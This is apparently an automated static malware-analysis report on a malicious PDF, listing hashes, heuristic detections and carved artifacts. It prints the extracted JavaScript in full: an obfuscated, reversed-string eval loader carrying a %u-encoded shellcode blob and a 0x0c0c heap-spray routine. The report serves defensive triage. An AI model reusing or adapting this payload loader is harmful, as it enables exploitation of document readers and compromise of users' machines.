Malicious PDF — malware analysis report

Static analysis result for SHA-256 b7233954d3bf06d3…

MALICIOUS

PDF

69.4 KB First seen: 2026-05-08
MD5: 4e4d4e66a749c10b5b77738f10e3ca67 SHA-1: 6dabbfed6d121219a47ec15ebc45bd4f69903987 SHA-256: b7233954d3bf06d3aed09b4bdbc1a14167a64b0fcce0fe10d8efa49210b7f102
68 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9996

Heuristics 4

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com In PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0x104F0 3898 bytes
SHA-256: 4279144ff2b40063141df37833201a8a54e34c314db7f12b9d05bc46244426c5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var eva=new Function("a","ev     al        (a);".split(" ").join(""));
       var s=' ;"s"+3_ozotlav=]i_ozotlav[4_ozotlav )++i_ozotlav;0f1x0<i_ozotlav;0=i_ozotlav( rof ;)(yarrA wen = 4_ozotlav rav ;)2 / )80x0-0201x0( - 00008x0 ,0(gnirtsbus.d_ozotlav = 3_ozotlav ;d_ozotlav =+ d_ozotlav )00008x0 < htgnel.d_ozotlav(elihw ;)2/63556 ,0(gnirtsbus.b_ozotlav = d_ozotlav ;c_ozotlav =+ b_ozotlav ;olygak =+ b_ozotlav ;)2/)42x0-c0c0x0( ,0(gnirtsbus.c_ozotlav = b_ozotlav ;c_ozotlav=+c_ozotlav )63556 < 8 + 02 + htgnel.c_ozotlav( elihw ;) "c" + "0" + "c" + "0" + "u" + "%" + "c" + "0" + "c" + "0" + "u" + "%" (epak = c_ozotlav rav ;) )""(nioj.)" "(tilps."7a14  u % b761  u % 752a  u % bfc6  u % 6770  u % 76ce  u % 4104  u % 745a  u % 213d  u % 6d0c  u % ef99  u % 9864  u % b8c9  u % d665  u % e7cd  u % 355d  u % 08e9  u % d022  u % 0db9  u % 58b7  u % 949a  u % a613  u % a9cc  u % deca  u % 1130  u % 48d9  u % 9032  u % 28d9  u % 37a5  u % 37f0  u % 82c   0  u % 7657  u % 22e9  u % 6b0d  u % 1363  u % 7dfa  u % 06a4  u % 30e8  u % 4a10  u % 739a  u % 3608  u % ab60  u % 8c47  u % b31c  u % f805  u % e458  u % 4ca5  u % 993d  u % c1b5  u % 9c   06  u % 9fbf  u % d05e  u % 9308  u % 072d  u % 1c37  u % f87a  u % 583b  u % 2055  u % aba7  u % a36f  u % 13b4  u % ae7a  u % 1484  u % d5c4  u % d710  u % 98f0  u % c50f  u % 2e04  u % 218c  u % 94bc  u % b089  u % cb07  u % e664  u % cf60  u % 9b9c  u % c37e  u % c8b8  u % d86f  u % 3dcf  u % 262a  u % 2908  u % f63a  u % baf4  u % a334  u % 6dd0  u % 8f1c  u % 6d14  u % 7efe  u % 0ee6  u % e404  u % 7295  u % 4bc2  u % 169a  u % 4374  u % 1ebf  u % 5077  u % 57e6  u % 4352  u % bfb8  u % 3a23  u % 0f37  u % 24b3  u % 38f0  u % 6571  u % 7130  u % 1365  u % 50e5  u % 649d  u % ab9c  u % 424f  u % 9d47  u % 1b33  u % 929c  u % bd6d  u % 0070  u % f211  u % 0070  u % 137d  u % 0070  u % d451  u % ff09  u % ffff  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 0909  u % 0909  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 0909  u % 0909  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 0909  u % ff09  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % ffff  u % 8e6e  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % be50  u % 57ee  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % c   0c   0  u % c   0c   0  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 18bf  u % 2c40  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 4038  u % 380c  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 9881  u % b8a1  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 5185  u % a5be  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 4509  u % a509  u % 0070  u % bb51  u % 0070  u % 137d  u % 0000  u % 0400  u % 0000  u % 0001  u % 1000  u % 4010  u % 0000  u % 0000  u % 1000  u % 0010  u % ffff  u % ffff  u % 0070  u % 45c5  u % 0070  u % 2e25  u % 1000  u % 1100  u % 0070  u % 7f27  u % 0070  u % ca8a  u % 1000  u % 0010  u % 0070  u % bb51  u % 0070  u % ca8a  u % 1000  u % 1100  u % 0070  u % bb51  u % 0070  u % 2bf7  u % eff7  u % 0030  u % 0070  u % bb51  u % 0070  u % d451  u % 0000  u % 0001  u % 0070  u % bb51  u % 1000  u % 4010  u % 0070  u % 7f27  u % 1000  u % 4210  u % 0070  u % 9951  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % c   0c   0  u % c   0c   0  u % 0070  u % 4809  u % 0070  u % 3309  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % cccc  u % cccc  u % 0070  u % f651  u % 0070  u % fe84  u % cccc  u % cccc  u % 0070  u % 9194  u % c   0c   0  u % c   0c   0  u % " (epak = olygak rav ;epacsenu = epak rav ';
eva(s.split("").reverse().join(""));
font_00_sfnt_off00000319.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x319 65932 bytes
SHA-256: 67cf5b115c479e7cc69ef02607414d718125a1e117a59d537db3e97682d5b723
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)

Open this report in the interactive analyzer, or submit your own file for analysis.